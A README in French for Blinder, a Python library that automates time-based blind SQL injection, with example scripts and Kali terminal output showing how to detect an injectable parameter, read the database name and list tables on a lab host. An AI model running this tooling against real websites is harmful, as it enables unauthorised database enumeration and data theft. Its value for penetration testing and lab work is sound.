
Une bibliothèque Python pour automatiser l'injection SQL aveugle basée sur le temps.
Blinder est une petite bibliothèque Python permettant d'automatiser les injections SQL aveugles basées sur le temps en utilisant des requêtes prédéfinies sous forme de fonctions pour accélérer le développement d'une preuve de concept (PoC).
Vous pouvez installer Blinder avec la commande suivante :
pip install blinder
Ou en téléchargeant les sources et en l'important manuellement dans votre projet.
Pour utiliser Blinder, vous devez importer le module Blinder, puis commencer à utiliser les fonctions principales de Blinder.
Vous pouvez utiliser Blinder (dans sa version actuelle) pour effectuer les actions suivantes :
Vous pouvez vérifier la présence d'une injection dans une URL avec le code suivant :
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
Le résultat de l'exécution sera :
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
Vous pouvez obtenir le nom de la base de données avec le code suivant :
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Le nom de la base de données est : %s " % blind.get_database()
Et les résultats seront :
root@kali:~/Desktop# python get-database.py
Le nom de la base de données est : db1
root@kali:~/Desktop#
Pour obtenir les noms des tables, vous pouvez utiliser le code suivant :
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
Et les résultats seront :
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
De nombreuses fonctionnalités devraient être ajoutées prochainement, comme :